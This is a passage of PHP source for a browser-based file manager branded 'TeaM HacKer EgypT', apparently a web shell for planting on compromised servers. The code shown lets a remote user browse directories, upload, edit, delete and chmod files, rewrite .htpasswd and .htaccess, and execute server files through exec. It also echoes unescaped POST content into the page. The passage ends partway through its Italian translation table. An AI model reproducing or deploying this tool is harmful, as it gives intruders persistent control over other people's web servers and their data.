    		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
    		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
    		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
    
    		if (@chmod($file, $mode)) {
    			listing_page(notice('permission_set', $file, decoct($mode)));
    		} else {
    			listing_page(error('permission_not_set', $file, decoct($mode)));
    		}
    
    	} else {
    
    		html_header();
    
    		$mode = fileperms($file);
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    
    	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
    
    	<hr />
    
    	<table id="permission">
    	<tr>
    		<td></td>
    		<td style="border-right: 1px solid black">' . word('owner') . '</td>
    		<td style="border-right: 1px solid black">' . word('group') . '</td>
    		<td>' . word('other') . '</td>
    	</tr>
    	<tr>
    		<td style="text-align: right">' . word('read') . ':</td>
    		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
    	</tr>
    	<tr>
    		<td style="text-align: right">' . word('write') . ':</td>
    		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
    	</tr>
    	<tr>
    		<td style="text-align: right">' . word('execute') . ':</td>
    		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
    		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
    	</tr>
    	</table>
    
    	<hr />
    
    	<input type="submit" name="set" value="' . word('set') . '" />
    
    	<input type="hidden" name="action" value="permission" />
    	<input type="hidden" name="file" value="' . html($file) . '" />
    	<input type="hidden" name="dir" value="' . html($directory) . '" />
    
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    default:
    
    	listing_page();
    
    }
    
    /* ------------------------------------------------------------------------- */
    
    function getlist ($directory) {
    	global $delim, $win;
    
    	if ($d = @opendir($directory)) {
    
    		while (($filename = @readdir($d)) !== false) {
    
    			$path = $directory . $filename;
    
    			if ($stat = @lstat($path)) {
    
    				$file = array(
    					'filename'    => $filename,
    					'path'        => $path,
    					'is_file'     => @is_file($path),
    					'is_dir'      => @is_dir($path),
    					'is_link'     => @is_link($path),
    					'is_readable' => @is_readable($path),
    					'is_writable' => @is_writable($path),
    					'size'        => $stat['size'],
    					'permission'  => $stat['mode'],
    					'owner'       => $stat['uid'],
    					'group'       => $stat['gid'],
    					'mtime'       => @filemtime($path),
    					'atime'       => @fileatime($path),
    					'ctime'       => @filectime($path)
    				);
    
    				if ($file['is_dir']) {
    					$file['is_executable'] = @file_exists($path . $delim . '.');
    				} else {
    					if (!$win) {
    						$file['is_executable'] = @is_executable($path);
    					} else {
    						$file['is_executable'] = true;
    					}
    				}
    
    				if ($file['is_link']) $file['target'] = @readlink($path);
    
    				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
    				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
    
    				$files[] = $file;
    
    			}
    
    		}
    
    		return $files;
    
    	} else {
    		return false;
    	}
    
    }
    
    function sortlist (&$list, $key, $reverse) {
    
    	quicksort($list, 0, sizeof($list) - 1, $key);
    
    	if ($reverse) $list = array_reverse($list);
    
    }
    
    function quicksort (&$array, $first, $last, $key) {
    
    	if ($first < $last) {
    
    		$cmp = $array[floor(($first + $last) / 2)][$key];
    
    		$l = $first;
    		$r = $last;
    
    		while ($l <= $r) {
    
    			while ($array[$l][$key] < $cmp) $l++;
    			while ($array[$r][$key] > $cmp) $r--;
    
    			if ($l <= $r) {
    
    				$tmp = $array[$l];
    				$array[$l] = $array[$r];
    				$array[$r] = $tmp;
    
    				$l++;
    				$r--;
    
    			}
    
    		}
    
    		quicksort($array, $first, $r, $key);
    		quicksort($array, $l, $last, $key);
    
    	}
    
    }
    
    function permission_octal2string ($mode) {
    
    	if (($mode & 0xC000) === 0xC000) {
    		$type = 's';
    	} elseif (($mode & 0xA000) === 0xA000) {
    		$type = 'l';
    	} elseif (($mode & 0x8000) === 0x8000) {
    		$type = '-';
    	} elseif (($mode & 0x6000) === 0x6000) {
    		$type = 'b';
    	} elseif (($mode & 0x4000) === 0x4000) {
    		$type = 'd';
    	} elseif (($mode & 0x2000) === 0x2000) {
    		$type = 'c';
    	} elseif (($mode & 0x1000) === 0x1000) {
    		$type = 'p';
    	} else {
    		$type = '?';
    	}
    
    	$owner  = ($mode & 00400) ? 'r' : '-';
    	$owner .= ($mode & 00200) ? 'w' : '-';
    	if ($mode & 0x800) {
    		$owner .= ($mode & 00100) ? 's' : 'S';
    	} else {
    		$owner .= ($mode & 00100) ? 'x' : '-';
    	}
    
    	$group  = ($mode & 00040) ? 'r' : '-';
    	$group .= ($mode & 00020) ? 'w' : '-';
    	if ($mode & 0x400) {
    		$group .= ($mode & 00010) ? 's' : 'S';
    	} else {
    		$group .= ($mode & 00010) ? 'x' : '-';
    	}
    
    	$other  = ($mode & 00004) ? 'r' : '-';
    	$other .= ($mode & 00002) ? 'w' : '-';
    	if ($mode & 0x200) {
    		$other .= ($mode & 00001) ? 't' : 'T';
    	} else {
    		$other .= ($mode & 00001) ? 'x' : '-';
    	}
    
    	return $type . $owner . $group . $other;
    
    }
    
    function is_script ($filename) {
    	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
    }
    
    function getmimetype ($filename) {
    	static $mimes = array(
    		'\.jpg$|\.jpeg$'  => 'image/jpeg',
    		'\.gif$'          => 'image/gif',
    		'\.png$'          => 'image/png',
    		'\.html$|\.html$' => 'text/html',
    		'\.txt$|\.asc$'   => 'text/plain',
    		'\.xml$|\.xsl$'   => 'application/xml',
    		'\.pdf$'          => 'application/pdf'
    	);
    
    	foreach ($mimes as $regex => $mime) {
    		if (eregi($regex, $filename)) return $mime;
    	}
    
    	// return 'application/octet-stream';
    	return 'text/plain';
    
    }
    
    function del ($file) {
    	global $delim;
    
    	if (!@is_link($file) && !file_exists($file)) return false;
    
    	if (!@is_link($file) && @is_dir($file)) {
    
    		if ($dir = @opendir($file)) {
    
    			$error = false;
    
    			while (($f = readdir($dir)) !== false) {
    				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
    					$error = true;
    				}
    			}
    			closedir($dir);
    
    			if (!$error) return @rmdir($file);
    
    			return !$error;
    
    		} else {
    			return false;
    		}
    
    	} else {
    		return @unlink($file);
    	}
    
    }
    
    function addslash ($directory) {
    	global $delim;
    
    	if (substr($directory, -1, 1) != $delim) {
    		return $directory . $delim;
    	} else {
    		return $directory;
    	}
    
    }
    
    function relative2absolute ($string, $directory) {
    
    	if (path_is_relative($string)) {
    		return simplify_path(addslash($directory) . $string);
    	} else {
    		return simplify_path($string);
    	}
    
    }
    
    function path_is_relative ($path) {
    	global $win;
    
    	if ($win) {
    		return (substr($path, 1, 1) != ':');
    	} else {
    		return (substr($path, 0, 1) != '/');
    	}
    
    }
    
    function absolute2relative ($directory, $target) {
    	global $delim;
    
    	$path = '';
    	while ($directory != $target) {
    		if ($directory == substr($target, 0, strlen($directory))) {
    			$path .= substr($target, strlen($directory));
    			break;
    		} else {
    			$path .= '..' . $delim;
    			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
    		}
    	}
    	if ($path == '') $path = '.';
    
    	return $path;
    
    }
    
    function simplify_path ($path) {
    	global $delim;
    
    	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
    		$path = realpath($path);
    		if (@is_dir($path)) {
    			return addslash($path);
    		} else {
    			return $path;
    		}
    	}
    
    	$pattern  = $delim . '.' . $delim;
    
    	if (@is_dir($path)) {
    		$path = addslash($path);
    	}
    
    	while (strpos($path, $pattern) !== false) {
    		$path = str_replace($pattern, $delim, $path);
    	}
    
    	$e = addslashes($delim);
    	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
    
    	while (ereg($regex, $path)) {
    		$path = ereg_replace($regex, $delim, $path);
    	}
    	
    	return $path;
    
    }
    
    function human_filesize ($filesize) {
    
    	$suffices = 'kMGTPE';
    
    	$n = 0;
    	while ($filesize >= 1000) {
    		$filesize /= 1024;
    		$n++;
    	}
    
    	$filesize = round($filesize, 3 - strpos($filesize, '.'));
    
    	if (strpos($filesize, '.') !== false) {
    		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
    			$filesize = substr($filesize, 0, strlen($filesize) - 1);
    		}
    	}
    
    	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
    
    	return $filesize . " {$suffix}B";
    
    }
    
    function strip (&$str) {
    	$str = stripslashes($str);
    }
    
    /* ------------------------------------------------------------------------- */
    
    function listing_page ($message = null) {
    	global $self, $directory, $sort, $reverse;
    
    	html_header();
    
    	$list = getlist($directory);
    
    	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
    	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
    
    	sortlist($list, $sort, $reverse);
    
    	echo '<h1 style="margin-bottom: 0">TeaM HacKer EgypT</h1>
    
    <form enctype="multipart/form-data" action="' . $self . '" method="post">
    
    <table id="main">
    ';
    
    	directory_choice();
    
    	if (!empty($message)) {
    		spacer();
    		echo $message;
    	}
    
    	if (@is_writable($directory)) {
    		upload_box();
    		create_box();
    	} else {
    		spacer();
    	}
    
    	if ($list) {
    		listing($list);
    	} else {
    		echo error('not_readable', $directory);
    	}
    
    	echo '</table>
    
    </form>
    
    ';
    
    	html_footer();
    
    }
    
    function listing ($list) {
    	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
    
    	echo '<tr class="listing">
    	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
    ';
    
    	$d = 'dir=' . urlencode($directory) . '&';
    
    	if (!$reverse && $sort == 'filename') $r = '&reverse=true'; else $r = '';
    	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
    
    	if (!$reverse && $sort == 'size') $r = '&reverse=true'; else $r = '';
    	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
    
    	if (!$win) {
    
    		if (!$reverse && $sort == 'permission') $r = '&reverse=true'; else $r = '';
    		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
    
    		if (!$reverse && $sort == 'owner') $r = '&reverse=true'; else $r = '';
    		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
    
    		if (!$reverse && $sort == 'group') $r = '&reverse=true'; else $r = '';
    		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
    
    	}
    
    	echo '	<th class="functions">' . word('functions') . '</th>
    </tr>
    ';
    
    	for ($i = 0; $i < sizeof($list); $i++) {
    		$file = $list[$i];
    
    		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
    		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
    		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
    
    		echo '<tr class="listing">
    	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
    	<td class="filename" title="' . html($timestamps) . '">';
    
    		if ($file['is_link']) {
    
    			echo '<img src="' . $self . '?image=link" alt="link" /> ';
    			echo html($file['filename']) . ' → ';
    
    			$real_file = relative2absolute($file['target'], $directory);
    
    			if (@is_readable($real_file)) {
    				if (@is_dir($real_file)) {
    					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
    				} else {
    					echo '<a href="' . $self . '?action=view&file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
    				}
    			} else {
    				echo html($file['target']);
    			}
    
    		} elseif ($file['is_dir']) {
    
    			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
    			if ($win || $file['is_executable']) {
    				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
    			} else {
    				echo html($file['filename']);
    			}
    			echo ' ]';
    
    		} else {
    
    			if (substr($file['filename'], 0, 1) == '.') {
    				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
    			} else {
    				echo '<img src="' . $self . '?image=file" alt="file" /> ';
    			}
    
    			if ($file['is_file'] && $file['is_readable']) {
    			   echo '<a href="' . $self . '?action=view&file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
    			} else {
    				echo html($file['filename']);
    			}
    
    		}
    
    		if ($file['size'] >= 1000) {
    			$human = ' title="' . human_filesize($file['size']) . '"';
    		} else {
    			$human = '';
    		}
    
    		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
    
    		if (!$win) {
    
    			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
    
    			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
    			if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($file['path']) . '&dir=' . urlencode($directory) . '">';
    			echo html(permission_octal2string($file['permission']));
    			if ($l) echo '</a>';
    
    			echo "</td>\n";
    
    			if (array_key_exists('owner_name', $file)) {
    				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
    			} else {
    				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
    			}
    
    			if (array_key_exists('group_name', $file)) {
    				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
    			} else {
    				echo "\t<td class=\"group\">{$file['group']}</td>\n";
    			}
    
    		}
    
    		echo '	<td class="functions">
    		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
    ';
    
    		$actions = array();
    		if (function_exists('symlink')) {
    			$actions[] = 'create_symlink';
    		}
    		if (@is_writable(dirname($file['path']))) {
    			$actions[] = 'delete';
    			$actions[] = 'rename';
    			$actions[] = 'move';
    		}
    		if ($file['is_file'] && $file['is_readable']) {
    			$actions[] = 'copy';
    			$actions[] = 'download';
    			if ($file['is_writable']) $actions[] = 'edit';
    		}
    		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
    			$actions[] = 'execute';
    		}
    
    		if (sizeof($actions) > 0) {
    
    			echo '		<select class="small" name="action' . $i . '" size="1">
    		<option value="">' . str_repeat(' ', 30) . '</option>
    ';
    
    			foreach ($actions as $action) {
    				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
    			}
    
    			echo '		</select>
    		<input class="small" type="submit" name="submit' . $i . '" value=" > " onfocus="activate(\'other\')" />
    ';
    
    		}
    
    		echo '	</td>
    </tr>
    ';
    
    	}
    
    	echo '<tr class="listing_footer">
    	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt=">" /></td>
    	<td colspan="' . ($cols - 1) . '">
    		<input type="hidden" name="num" value="' . sizeof($list) . '" />
    		<input type="hidden" name="focus" value="" />
    		<input type="hidden" name="olddir" value="' . html($directory) . '" />
    ';
    
    	$actions = array();
    	if (@is_writable(dirname($file['path']))) {
    		$actions[] = 'delete';
    		$actions[] = 'move';
    	}
    	$actions[] = 'copy';
    
    	echo '		<select class="small" name="action_all" size="1">
    		<option value="">' . str_repeat(' ', 30) . '</option>
    ';
    
    	foreach ($actions as $action) {
    		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
    	}
    
    	echo '		</select>
    		<input class="small" type="submit" name="submit_all" value=" > " onfocus="activate(\'other\')" />
    	</td>
    </tr>
    ';
    
    }
    
    function directory_choice () {
    	global $directory, $homedir, $cols, $self;
    
    	echo '<tr>
    	<td colspan="' . $cols . '" id="directory">
    		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
    		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
    		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
    	</td>
    </tr>
    ';
    
    }
    
    function upload_box () {
    	global $cols;
    
    	echo '<tr>
    	<td colspan="' . $cols . '" id="upload">
    		' . word('file') . ':
    		<input type="file" name="upload" onfocus="activate(\'other\')" />
    		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
    	</td>
    </tr>
    ';
    
    }
    
    function create_box () {
    	global $cols;
    
    	echo '<tr>
    	<td colspan="' . $cols . '" id="create">
    		<select name="create_type" size="1" onfocus="activate(\'create\')">
    		<option value="file">' . word('file') . '</option>
    		<option value="directory">' . word('directory') . '</option>
    		</select>
    		<input type="text" name="create_name" onfocus="activate(\'create\')" />
    		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
    	</td>
    </tr>
    ';
    
    }
    
    function edit ($file) {
    	global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
    
    	html_header();
    
    	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
    
    <form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    
    	<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
    
    	if (array_key_exists('content', $_POST)) {
    		echo $_POST['content'];
    	} else {
    		$f = fopen($file, 'r');
    		while (!feof($f)) {
    			echo html(fread($f, 8192));
    		}
    		fclose($f);
    	}
    
    	if (!empty($_POST['user'])) {
    		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
    	}
    	if (!empty($_POST['basic_auth'])) {
    		if ($win) {
    			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
    		} else {
    			$authfile = $directory . $htpasswd;
    		}
    		echo "\nAuthType Basic\nAuthName \"Restricted Directory\"\n";
    		echo 'AuthUserFile "' . html($authfile) . "\"\n";
    		echo 'Require valid-user';
    	}
    
    	echo '</textarea>
    
    	<hr />
    ';
    
    	if ($apache && basename($file) == $htpasswd) {
    		echo '
    	' . word('user') . ': <input type="text" name="user" />
    	' . word('password') . ': <input type="password" name="password" />
    	<input type="submit" value="' . word('add') . '" />
    
    	<hr />
    ';
    
    	}
    
    	if ($apache && basename($file) == $htaccess) {
    		echo '
    	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
    
    	<hr />
    ';
    
    	}
    
    	echo '
    	<input type="hidden" name="action" value="edit" />
    	<input type="hidden" name="file" value="' . html($file) . '" />
    	<input type="hidden" name="dir" value="' . html($directory) . '" />
    	<input type="reset" value="' . word('reset') . '" id="red_button" />
    	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
    
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    	html_footer();
    
    }
    
    function spacer () {
    	global $cols;
    
    	echo '<tr>
    	<td colspan="' . $cols . '" style="height: 1em"></td>
    </tr>
    ';
    
    }
    
    function textfieldsize ($content) {
    
    	$size = strlen($content) + 5;
    	if ($size < 30) $size = 30;
    
    	return $size;
    
    }
    
    function request_dump () {
    
    	foreach ($_REQUEST as $key => $value) {
    		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
    	}
    
    }
    
    /* ------------------------------------------------------------------------- */
    
    function html ($string) {
    	global $site_charset;
    	return htmlentities($string, ENT_COMPAT, $site_charset);
    }
    
    function word ($word) {
    	global $words, $word_charset;
    	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
    }
    
    function phrase ($phrase, $arguments) {
    	global $words;
    	static $search;
    
    	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
    
    	for ($i = 0; $i < sizeof($arguments); $i++) {
    		$arguments[$i] = nl2br(html($arguments[$i]));
    	}
    
    	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
    
    	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
    
    }
    
    function getwords ($lang) {
    	global $word_charset, $date_format;
    
    	switch ($lang) {
    	case 'de':
    
    		$date_format = 'd.m.y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Verzeichnis',
    'file' => 'Datei',
    'filename' => 'Dateiname',
    
    'size' => 'Größe',
    'permission' => 'Rechte',
    'owner' => 'Eigner',
    'group' => 'Gruppe',
    'other' => 'Andere',
    'functions' => 'Funktionen',
    
    'read' => 'lesen',
    'write' => 'schreiben',
    'execute' => 'ausführen',
    
    'create_symlink' => 'Symlink erstellen',
    'delete' => 'löschen',
    'rename' => 'umbenennen',
    'move' => 'verschieben',
    'copy' => 'kopieren',
    'edit' => 'editieren',
    'download' => 'herunterladen',
    'upload' => 'hochladen',
    'create' => 'erstellen',
    'change' => 'wechseln',
    'save' => 'speichern',
    'set' => 'setze',
    'reset' => 'zurücksetzen',
    'relative' => 'Pfad zum Ziel relativ',
    
    'yes' => 'Ja',
    'no' => 'Nein',
    'back' => 'zurück',
    'destination' => 'Ziel',
    'symlink' => 'Symbolischer Link',
    'no_output' => 'keine Ausgabe',
    
    'user' => 'Benutzername',
    'password' => 'Kennwort',
    'add' => 'hinzufügen',
    'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
    
    'uploaded' => '"[%1]" wurde hochgeladen.',
    'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
    'already_exists' => '"[%1]" existiert bereits.',
    'created' => '"[%1]" wurde erstellt.',
    'not_created' => '"[%1]" konnte nicht erstellt werden.',
    'really_delete' => 'Sollen folgende Dateien wirklich gelöscht werden?',
    'deleted' => "Folgende Dateien wurden gelöscht:\n[%1]",
    'not_deleted' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
    'rename_file' => 'Benenne Datei um:',
    'renamed' => '"[%1]" wurde in "[%2]" umbenannt.',
    'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
    'move_files' => 'Verschieben folgende Dateien:',
    'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
    'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
    'copy_files' => 'Kopiere folgende Dateien:',
    'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
    'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
    'not_edited' => '"[%1]" kann nicht editiert werden.',
    'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
    'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
    'saved' => '"[%1]" wurde gespeichert.',
    'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
    'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
    'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
    'permission_for' => 'Rechte für "[%1]":',
    'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
    'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
    'not_readable' => '"[%1]" kann nicht gelesen werden.'
    		);
    
    	case 'fr':
    
    		$date_format = 'd.m.y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Répertoire',
    'file' => 'Fichier',
    'filename' => 'Nom fichier',
    
    'size' => 'Taille',
    'permission' => 'Droits',
    'owner' => 'Propriétaire',
    'group' => 'Groupe',
    'other' => 'Autres',
    'functions' => 'Fonctions',
    
    'read' => 'Lire',
    'write' => 'Ecrire',
    'execute' => 'Exécuter',
    
    'create_symlink' => 'Créer lien symbolique',
    'delete' => 'Effacer',
    'rename' => 'Renommer',
    'move' => 'Déplacer',
    'copy' => 'Copier',
    'edit' => 'Ouvrir',
    'download' => 'Télécharger sur PC',
    'upload' => 'Télécharger sur serveur',
    'create' => 'Créer',
    'change' => 'Changer',
    'save' => 'Sauvegarder',
    'set' => 'Exécuter',
    'reset' => 'Réinitialiser',
    'relative' => 'Relatif',
    
    'yes' => 'Oui',
    'no' => 'Non',
    'back' => 'Retour',
    'destination' => 'Destination',
    'symlink' => 'Lien symbollique',
    'no_output' => 'Pas de sortie',
    
    'user' => 'Utilisateur',
    'password' => 'Mot de passe',
    'add' => 'Ajouter',
    'add_basic_auth' => 'add basic-authentification',
    
    'uploaded' => '"[%1]" a t tlcharg sur le serveur.',
    'not_uploaded' => '"[%1]" n a pas t tlcharg sur le serveur.',
    'already_exists' => '"[%1]" existe dj.',
    'created' => '"[%1]" a t cr.',
    'not_created' => '"[%1]" n a pas pu tre cr.',
    'really_delete' => 'Effacer le fichier?',
    'deleted' => "Ces fichiers ont t dtuits:\n[%1]",
    'not_deleted' => "Ces fichiers n ont pu tre dtruits:\n[%1]",
    'rename_file' => 'Renomme fichier:',
    'renamed' => '"[%1]" a t renomm en "[%2]".',
    'not_renamed' => '"[%1] n a pas pu tre renomm en "[%2]".',
    'move_files' => 'Dplacer ces fichiers:',
    'moved' => "Ces fichiers ont t dplacs en \"[%2]\":\n[%1]",
    'not_moved' => "Ces fichiers n ont pas pu tre dplacs en \"[%2]\":\n[%1]",
    'copy_files' => 'Copier ces fichiers:',
    'copied' => "Ces fichiers ont t copis en \"[%2]\":\n[%1]",
    'not_copied' => "Ces fichiers n ont pas pu tre copis en \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" ne peut tre ouvert.',
    'executed' => "\"[%1]\" a t brillamment excut :\n{%2}",
    'not_executed' => "\"[%1]\" n a pas pu tre excut:\n{%2}",
    'saved' => '"[%1]" a t sauvegard.',
    'not_saved' => '"[%1]" n a pas pu tre sauvegard.',
    'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a t cre.',
    'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu tre cr.',
    'permission_for' => 'Droits de "[%1]":',
    'permission_set' => 'Droits de "[%1]" ont t changs en [%2].',
    'permission_not_set' => 'Droits de "[%1]" n ont pas pu tre changs en[%2].',
    'not_readable' => '"[%1]" ne peut pas tre ouvert.'
    		);
    
    	case 'it':
    
    		$date_format = 'd-m-Y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Directory',
    'file' => 'File',
    'filename' => 'Nome File',
    
    'size' => 'Dimensioni',
    'permission' => 'Permessi',
    'owner' => 'Proprietario',
    'group' => 'Gruppo',
    'other' => 'Altro',
    'functions' => 'Funzioni',
    
    'read' => 'leggi',
    'write' => 'scrivi',
    'execute' => 'esegui',
    
    'create_symlink' => 'crea link simbolico',
    'delete' => 'cancella',
    'rename' => 'rinomina',
    'move' => 'sposta',
    'copy' => 'copia',
    'edit' => 'modifica',
    'download' => 'download',
    'upload' => 'upload',
    'create' => 'crea',
    'change' => 'cambia',
    'save' => 'salva',
    'set' => 'imposta',
    'reset' => 'reimposta',
    'relative' => 'Percorso relativo per la destinazione',
    
    'yes' => 'Si',
    'no' => 'No',
    'back' => 'indietro',
    'destination' => 'Destinazione',
    'symlink' => 'Link simbolico',
    'no_output' => 'no output',
    
    'user' => 'User',
    'password' => 'Password',
    'add' => 'aggiungi',
    'add_basic_auth' => 'aggiungi autenticazione base',
    
    'uploaded' => '"[%1]"  stato caricato.',
    'not_uploaded' => '"[%1]" non  stato caricato.',
    'already_exists' => '"[%1]" esiste gi.',
    'created' => '"[%1]"  stato creato.',
    'not_created' => '"[%1]" non  stato creato.',
    'really_delete' => 'Cancello questi file ?',
    'deleted' => "Questi file sono stati cancellati:\n[%1]",
    'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
    'rename_file' => 'File rinominato:',
    'renamed' => '"[%1]"  stato rinominato in "[%2]".',
    'not_renamed' => '"[%1] non  stato rinominato in "[%2]".',
    'move_files' => 'Sposto questi file:',
    'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
    'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
    'copy_files' => 'Copio questi file',
    'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
    'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" non puٍ essere modificato.',
    'executed' => "\"[%1]\"  stato eseguito con successo:\n{%2}",
    'not_executed' => "\"[%1]\" non  stato eseguito con successo\n{%2}",
    'saved' => '"[%1]"  stato salvato.',
    'not_saved' => '"[%1]" non  stato salvato.',
    'symlinked' => 'Il link siambolico da "[%2]" a "[%1]"  stato creato.',
